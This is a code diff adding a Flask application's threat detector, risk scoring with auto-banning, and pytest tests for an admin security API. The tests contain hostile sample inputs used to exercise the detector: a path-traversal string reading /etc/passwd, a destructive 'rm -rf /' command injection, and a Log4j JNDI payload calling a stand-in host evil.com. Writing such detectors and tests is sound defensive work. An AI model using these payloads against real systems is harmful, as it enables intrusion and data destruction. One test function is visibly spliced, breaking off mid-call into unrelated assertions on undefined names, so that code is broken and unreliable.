int(row["risk_score"] or 0) + updated_at = row["updated_at"] or row["created_at"] + hours = self._hours_since(updated_at, now) + if hours <= 0: + continue + new_score = self._apply_hourly_decay(current_score, hours) + if new_score == current_score: + continue + cursor.execute( + "UPDATE user_risk_scores SET risk_score = ?, updated_at = ? WHERE user_id = ?", + (new_score, now_str, user_id), + ) + + conn.commit() + + def _update_ip_score(self, ip: str, score_delta: int): + """更新IP风险分""" + ip_text = str(ip or "").strip()[:64] + if not ip_text: + return + delta = int(score_delta) + now_str = get_cst_now_str() + with db_pool.get_db() as conn: + cursor = conn.cursor() + self._update_scores(cursor, ip_text, None, delta, now_str) + conn.commit() + + def _update_user_score(self, user_id: int, score_delta: int): + """更新用户风险分""" + if user_id is None: + return + user_id_int = int(user_id) + delta = int(score_delta) + now_str = get_cst_now_str() + with db_pool.get_db() as conn: + cursor = conn.cursor() + self._update_scores(cursor, "", user_id_int, delta, now_str) + conn.commit() + + def _update_scores( + self, + cursor, + ip: str, + user_id: Optional[int], + score_delta: int, + now_str: str, + ) -> _ScoreUpdateResult: + ip_score = 0 + user_score = 0 + + if ip: + cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip,)) + row = cursor.fetchone() + current = int(row["risk_score"]) if row else 0 + ip_score = max(0, min(100, current + int(score_delta))) + if row: + cursor.execute( + "UPDATE ip_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE ip = ?", + (ip_score, now_str, now_str, ip), + ) + else: + cursor.execute( + """ + INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at) + VALUES (?, ?, ?, ?, ?) + """, + (ip, ip_score, now_str, now_str, now_str), + ) + + if user_id is not None: + cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (int(user_id),)) + row = cursor.fetchone() + current = int(row["risk_score"]) if row else 0 + user_score = max(0, min(100, current + int(score_delta))) + if row: + cursor.execute( + "UPDATE user_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE user_id = ?", + (user_score, now_str, now_str, int(user_id)), + ) + else: + cursor.execute( + """ + INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at) + VALUES (?, ?, ?, ?, ?) + """, + (int(user_id), user_score, now_str, now_str, now_str), + ) + + return _ScoreUpdateResult(ip_score=ip_score, user_score=user_score) + + def _get_auto_ban_actions( + self, + cursor, + ip: str, + user_id: Optional[int], + threat_type: str, + score: int, + update: _ScoreUpdateResult, + ) -> tuple[Optional["_BanAction"], Optional["_BanAction"]]: + ip_action: Optional[_BanAction] = None + user_action: Optional[_BanAction] = None + + if threat_type == C.THREAT_TYPE_JNDI_INJECTION: + if ip: + ip_action = _BanAction(reason="JNDI injection detected", permanent=True) + if user_id is not None: + user_action = _BanAction(reason="JNDI injection detected", permanent=True) + return ip_action, user_action + + if ip and update.ip_score >= 100: + ip_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours) + if user_id is not None and update.user_score >= 100: + user_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours) + + if score < self.high_risk_threshold: + return ip_action, user_action + + window_start = (get_cst_now() - timedelta(hours=self.high_risk_window_hours)).strftime("%Y-%m-%d %H:%M:%S") + + if ip: + cursor.execute( + """ + SELECT COUNT(*) AS cnt + FROM threat_events + WHERE ip = ? AND score >= ? AND created_at >= ? + """, + (ip, int(self.high_risk_threshold), window_start), + ) + row = cursor.fetchone() + cnt = int(row["cnt"]) if row else 0 + if cnt >= self.high_risk_permanent_ban_count: + ip_action = _BanAction(reason="High-risk threats threshold reached", permanent=True) + + if user_id is not None: + cursor.execute( + """ + SELECT COUNT(*) AS cnt + FROM threat_events + WHERE user_id = ? AND score >= ? AND created_at >= ? + """, + (int(user_id), int(self.high_risk_threshold), window_start), + ) + row = cursor.fetchone() + cnt = int(row["cnt"]) if row else 0 + if cnt >= self.high_risk_permanent_ban_count: + user_action = _BanAction(reason="High-risk threats threshold reached", permanent=True) + + return ip_action, user_action + + def _get_behavior_bonus(self, ip: str, user_id: Optional[int]) -> int: + return 0 + + def _hours_since(self, dt_str: Optional[str], now) -> int: + if not dt_str: + return 0 + try: + dt = parse_cst_datetime(str(dt_str)) + except Exception: + return 0 + seconds = (now - dt).total_seconds() + if seconds <= 0: + return 0 + return int(seconds // 3600) + + def _apply_hourly_decay(self, score: int, hours: int) -> int: + score_int = max(0, int(score)) + if score_int <= 0 or hours <= 0: + return score_int + decayed = int(math.floor(score_int * (0.9**int(hours)))) + return max(0, min(100, decayed)) diff --git a/security/threat_detector.py b/security/threat_detector.py new file mode 100644 index 0000000..f831d4e --- /dev/null +++ b/security/threat_detector.py @@ -0,0 +1,316 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +from dataclasses import dataclass +from typing import Any, Iterable, List, Optional, Tuple +from urllib.parse import unquote_plus + +from . import constants as C + + +@dataclass +class ThreatResult: + threat_type: str + score: int + field_name: str + rule: str = "" + matched: str = "" + value_preview: str = "" + + def to_dict(self) -> dict: + return { + "threat_type": self.threat_type, + "score": int(self.score), + "field_name": self.field_name, + "rule": self.rule, + "matched": self.matched, + "value_preview": self.value_preview, + } + + +class ThreatDetector: + def __init__( + self, + *, + max_value_length: int = 4096, + max_decode_rounds: int = 2, + ) -> None: + self.max_value_length = max(64, int(max_value_length)) + self.max_decode_rounds = max(0, int(max_decode_rounds)) + + def scan_input(self, value: Any, field_name: str = "value") -> List[ThreatResult]: + """扫描单个输入值(支持 dict/list 等嵌套结构)。""" + results: List[ThreatResult] = [] + for sub_field, leaf in self._flatten_value(value, field_name): + text = self._stringify(leaf) + if not text: + continue + if len(text) > self.max_value_length: + text = text[: self.max_value_length] + results.extend(self._scan_text(text, sub_field)) + results.sort(key=lambda r: int(r.score), reverse=True) + return results + + def scan_request(self, request: Any) -> List[ThreatResult]: + """扫描整个请求对象(兼容 Flask Request / dict 风格对象)。""" + results: List[ThreatResult] = [] + for field_name, value in self._extract_request_fields(request): + results.extend(self.scan_input(value, field_name)) + results.sort(key=lambda r: int(r.score), reverse=True) + return results + + # ==================== Internal scanning ==================== + + def _scan_text(self, text: str, field_name: str) -> List[ThreatResult]: + hits: List[ThreatResult] = [] + + for check in [ + self._check_jndi_injection, + self._check_sql_injection, + self._check_xss, + self._check_path_traversal, + self._check_command_injection, + ]: + result = check(text) + if result: + threat_type, score, rule, matched = result + hits.append( + ThreatResult( + threat_type=threat_type, + score=int(score), + field_name=field_name, + rule=rule, + matched=matched, + value_preview=self._preview(text), + ) + ) + + return hits + + def _check_jndi_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]: + # 1) Direct match + m = C.JNDI_DIRECT_RE.search(text) + if m: + return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT", m.group(0)) + + # 2) URL-decoded + decoded = self._multi_unquote(text) + if decoded != text: + m2 = C.JNDI_DIRECT_RE.search(decoded) + if m2: + return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT_URL_DECODED", m2.group(0)) + + # 3) Obfuscation patterns (raw/decoded) + for candidate, rule in [(text, "JNDI_OBFUSCATED"), (decoded, "JNDI_OBFUSCATED_URL_DECODED")]: + m3 = C.JNDI_OBFUSCATED_RE.search(candidate) + if m3: + return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, rule, m3.group(0)) + + # 4) Try limited de-obfuscation to reveal ${jndi:...} + deobf = self._deobfuscate_log4j(decoded) + if deobf and deobf != decoded: + m4 = C.JNDI_DIRECT_RE.search(deobf) + if m4: + return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, "JNDI_DEOBFUSCATED", m4.group(0)) + + # 5) Nested expression heuristic + for candidate in [text, decoded]: + m5 = C.NESTED_EXPRESSION_RE.search(candidate) + if m5: + return (C.THREAT_TYPE_NESTED_EXPRESSION, C.SCORE_NESTED_EXPRESSION, "NESTED_EXPRESSION", m5.group(0)) + + return None + + def _check_sql_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]: + candidates = [text, self._multi_unquote(text)] + for candidate in candidates: + m = C.SQLI_UNION_SELECT_RE.search(candidate) + if m: + return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_UNION_SELECT", m.group(0)) + m = C.SQLI_OR_1_EQ_1_RE.search(candidate) + if m: + return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_OR_1_EQ_1", m.group(0)) + return None + + def _check_xss(self, text: str) -> Optional[Tuple[str, int, str, str]]: + candidates = [text, self._multi_unquote(text)] + for candidate in candidates: + m = C.XSS_SCRIPT_TAG_RE.search(candidate) + if m: + return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_SCRIPT_TAG", m.group(0)) + m = C.XSS_JS_PROTOCOL_RE.search(candidate) + if m: + return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_JS_PROTOCOL", m.group(0)) + m = C.XSS_INLINE_EVENT_HANDLER_RE.search(candidate) + if m: + return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_INLINE_EVENT_HANDLER", m.group(0)) + return None + + def _check_path_traversal(self, text: str) -> Optional[Tuple[str, int, str, str]]: + decoded = self._multi_unquote(text) + candidates = [text, decoded] + for candidate in candidates: + m = C.PATH_TRAVERSAL_RE.search(candidate) + if m: + return (C.THREAT_TYPE_PATH_TRAVERSAL, C.SCORE_PATH_TRAVERSAL, "PATH_TRAVERSAL", m.group(0)) + return None + + def _check_command_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]: + decoded = self._multi_unquote(text) + candidates = [text, decoded] + for candidate in candidates: + m = C.CMD_INJECTION_SUBSHELL_RE.search(candidate) + if m: + return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_SUBSHELL", m.group(0)) + m = C.CMD_INJECTION_OPERATOR_WITH_CMD_RE.search(candidate) + if m: + return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_OPERATOR_WITH_CMD", m.group(0)) + return None + + # ==================== Helpers ==================== + + def _preview(self, text: str, limit: int = 160) -> str: + s = text.replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t") + if len(s) <= limit: + return s + return s[: limit - 3] + "..." + + def _stringify(self, value: Any) -> str: + if value is None: + return "" + if isinstance(value, bytes): + try: + return value.decode("utf-8", errors="ignore") + except Exception: + return "" + try: + return str(value) + except Exception: + return "" + + def _multi_unquote(self, text: str) -> str: + s = text + for _ in range(self.max_decode_rounds): + try: + nxt = unquote_plus(s) + except Exception: + break + if nxt == s: + break + s = nxt + return s + + def _deobfuscate_log4j(self, text: str) -> str: + # Replace ${...:-x} with x (including ${::-x}). + # This is intentionally conservative to reduce false positives. + import re + + s = text + pattern = re.compile(r"\$\{[^{}]{0,50}:-([a-zA-Z])\}") + for _ in range(3): + nxt = pattern.sub(lambda m: m.group(1), s) + if nxt == s: + break + s = nxt + return s + + def _flatten_value(self, value: Any, field_name: str) -> Iterable[Tuple[str, Any]]: + if isinstance(value, dict): + for k, v in value.items(): + key = self._stringify(k) or "key" + sub_name = f"{field_name}.{key}" if field_name else key + yield from self._flatten_value(v, sub_name) + return + if isinstance(value, (list, tuple, set)): + for i, v in enumerate(value): + sub_name = f"{field_name}[{i}]" + yield from self._flatten_value(v, sub_name) + return + yield (field_name, value) + + def _extract_request_fields(self, request: Any) -> List[Tuple[str, Any]]: + # dict-like input (useful for unit tests / non-Flask callers) + if isinstance(request, dict): + out: List[Tuple[str, Any]] = [] + for k, v in request.items(): + out.append((self._stringify(k) or "request", v)) + return out + + out: List[Tuple[str, Any]] = [] + + # path / method + for attr_name in ["method", "path", "full_path", "url", "remote_addr"]: + try: + v = getattr(request, attr_name, None) + except Exception: + v = None + if v: + out.append((attr_name, v)) + + # args / form (Flask MultiDict) + out.extend(self._extract_multidict(getattr(request, "args", None), "args")) + out.extend(self._extract_multidict(getattr(request, "form", None), "form")) + + # headers + try: + headers = getattr(request, "headers", None) + if headers is not None: + try: + items = headers.items() + except Exception: + items = [] + for k, v in items: + out.append((f"headers.{self._stringify(k)}", v)) + except Exception: + pass + + # cookies + try: + cookies = getattr(request, "cookies", None) + if isinstance(cookies, dict): + for k, v in cookies.items(): + out.append((f"cookies.{self._stringify(k)}", v)) + except Exception: + pass + + # json body + data = None + try: + get_json = getattr(request, "get_json", None) + if callable(get_json): + data = get_json(silent=True) + except Exception: + data = None + + if data is not None: + for name, v in self._flatten_value(data, "json"): + out.append((name, v)) + return out + + # raw body (as a fallback) + try: + get_data = getattr(request, "get_data", None) + if callable(get_data): + raw = get_data(cache=True, as_text=True) + if raw: + out.append(("body", raw)) + except Exception: + pass + + return out + + def _extract_multidict(self, md: Any, prefix: str) -> List[Tuple[str, Any]]: + out: List[Tuple[str, Any]] = [] + if md is None: + return out + try: + items = md.items(multi=True) + except Exception: + try: + items = md.items() + except Exception: + return out + for k, v in items: + out.append((f"{prefix}.{self._stringify(k)}", v)) + return out diff --git a/tests/test_admin_security_api.py b/tests/test_admin_security_api.py new file mode 100644 index 0000000..fdaed10 --- /dev/null +++ b/tests/test_admin_security_api.py @@ -0,0 +1,249 @@ +from __future__ import annotations + +from datetime import timedelta + +import pytest +from flask import Flask + +import db_pool +from db.schema import ensure_schema +from db.utils import get_cst_now +from security.blacklist import BlacklistManager +from security.risk_scorer import RiskScorer + + +@pytest.fixture() +def _test_db(tmp_path): + db_file = tmp_path / "admin_security_api_test.db" + + old_pool = getattr(db_pool, "_pool", None) + try: + if old_pool is not None: + try: + old_pool.close_all() + except Exception: + pass + db_pool._pool = None + db_pool.init_pool(str(db_file), pool_size=1) + + with db_pool.get_db() as conn: + ensure_schema(conn) + + yield db_file + finally: + try: + if getattr(db_pool, "_pool", None) is not None: + db_pool._pool.close_all() + except Exception: + pass + db_pool._pool = old_pool + + +def _make_app() -> Flask: + from routes.admin_api.security import security_bp + + app = Flask(__name__) + app.config.update(SECRET_KEY="test-secret", TESTING=True) + app.register_blueprint(security_bp) + return app + + +def _login_admin(client) -> None: + with client.session_transaction() as sess: + sess["admin_id"] = 1 + sess["admin_username"] = "admin" + + +def _insert_threat_event(*, threat_type: str, score: int, ip: str, user_id: int | None, created_at: str, payload: str): + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + INSERT INTO threat_events (threat_type, score, ip, user_id, request_path, value_preview, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?) + """, + (threat_type, int(score), ip, user_id, "/api/test", payload, created_at), + ) + conn.commit() + + +def test_dashboard_requires_admin(_test_db): + app = _make_app() + client = app.test_client() + + resp = client.get("/api/admin/security/dashboard") + assert resp.status_code == 403 + assert resp.get_json() == {"error": "需要管理员权限"} + + +def test_dashboard_counts_and_payload_truncation(_test_db): + app = _make_app() + client = app.test_client() + _login_admin(client) + + now = get_cst_now() + within_24h = now.strftime("%Y-%m-%d %H:%M:%S") + within_24h_2 = (now - timedelta(hours=1)).strftime("%Y-%m-%d %H:%M:%S") + older = (now - timedelta(hours=25)).strftime("%Y-%m-%d %H:%M:%S") + + long_payload = "x" * 300 + _insert_threat_event( + threat_type="sql_injection", + score=90, + ip="1.2.3.4", + user_id=10, + created_at=within_24h, + payload=long_payload, + ) + _insert_threat_event( + threat_type="xss", + score=70, + ip="2.3.4.5", + user_id=11, + created_at=within_24h_2, + payload="short", + ) + _insert_threat_event( + threat_type="path_traversal", + score=60, + ip="9.9.9.9", + user_id=None, + created_at=older, + payload="old", + ) + + manager = BlacklistManager() + manager.ban_ip("8.8.8.8", reason="manual", duration_hours=1, permanent=False) + manager._ban_user_internal(123, reason="manual", duration_hours=1, permanent=False) + + resp = client.get("/api/admin/security/dashboard") + assert resp.status_code == 200 + data = resp.get_json() + + assert data["threat_events_24h"] == 2 + assert data["banned_ip_count"] == 1 + assert data["banned_user_count"] == 1 + + recent = data["recent_threat_events"] + assert isinstance(recent, list) + assert len(recent) == 3 + + payload_preview = recent[0]["value_preview"] + assert isinstance(payload_preview, str) + assert len(payload_preview) <= 200 + assert payload_preview.endswith("...") + + +def test_threats_pagination_and_filters(_test_db): + app = _make_app() + client = app.test_client() + _login_admin(client) + + now = get_cst_now() + t1 = (now - timedelta(minutes=1)).strftime("%Y-%m-%d %H:%M:%S") + t2 = (now - timedelta(minutes=2)).strftime("%Y-%m-%d %H:%M:%S") + t3 = (now - timedelta(minutes=3)).strftime("%Y-%m-%d %H:%M:%S") + + _insert_threat_event(threat_type="sql_injection", score=90, ip="1.1.1.1", user_id=1, created_at=t1, payload="a") + _insert_threat_event(threat_type="xss", score=70, ip="2.2.2.2", user_id=2, created_at=t2, payload="b") + _insert_threat_event(threat_type="nested_expression", score=80, ip="3.3.3.3", user_id=3, created_at=t3, payload="c") + + resp = client.get("/api/admin/security/threats?page=1&per_page=2") + assert resp.status_code == 200 + data = resp.get_json() + assert data["total"] == 3 + assert len(data["items"]) == 2 + + resp2 = client.get("/api/admin/security/threats?page=2&per_page=2") + assert resp2.status_code == 200 + data2 = resp2.get_json() + assert data2["total"] == 3 + assert len(data2["items"]) == 1 + + resp3 = client.get("/api/admin/security/threats?event_type=sql_injection") + assert resp3.status_code == 200 + data3 = resp3.get_json() + assert data3["total"] == 1 + assert data3["items"][0]["threat_type"] == "sql_injection" + + resp4 = client.get("/api/admin/security/threats?severity=high") + assert resp4.status_code == 200 + data4 = resp4.get_json() + assert data4["total"] == 2 + assert {item["threat_type"] for item in data4["items"]} == {"sql_injection", "nested_expression"} + + +def test_ban_and_unban_ip(_test_db): + app = _make_app() + client = app.test_client() + _login_admin(client) + + resp = client.post("/api/admin/security/ban-ip", json={"ip": "7.7.7.7", "reason": "test", "duration_hours": 1}) + assert resp.status_code == 200 + assert resp.get_json()["success"] is True + + list_resp = client.get("/api/admin/security/banned-ips") + assert list_resp.status_code == 200 + payload = list_resp.get_json() + assert payload["count"] == 1 + assert payload["items"][0]["ip"] == "7.7.7.7" + + resp2 = client.post("/api/admin/security/unban-ip", json={"ip": "7.7.7.7"}) + assert resp2.status_code == 200 + assert resp2.get_json()["success"] is True + + list_resp2 = client.get("/api/admin/security/banned-ips") + assert list_resp2.status_code == 200 + assert list_resp2.get_json()["count"] == 0 + + +def test_risk_endpoints_and_cleanup(_test_db): + app = _make_app() + client = app.test_client() + _login_admin(client) + + scorer = RiskScorer(auto_ban_enabled=False) + scorer.record_threat("4.4.4.4", 44, threat_type="xss", score=20, request_path="/", payload="", "q") + assert any(r.threat_type == C.THREAT_TYPE_XSS and r.score == 70 for r in results) + + +def test_path_traversal_scores_60(): + detector = ThreatDetector() + results = detector.scan_input("../../etc/passwd", "path") + assert any(r.threat_type == C.THREAT_TYPE_PATH_TRAVERSAL and r.score == 60 for r in results) + + +def test_command_injection_scores_85(): + detector = ThreatDetector() + results = detector.scan_input("test; rm -rf /", "cmd") + assert any(r.threat_type == C.THREAT_TYPE_COMMAND_INJECTION and r.score == 85 for r in results) + + +def test_scan_request_picks_up_args(): + app = Flask(__name__) + detector = ThreatDetector() + + with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"): + results = detector.scan_request(request) + assert any(r.field_name == "args.q" and r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results) +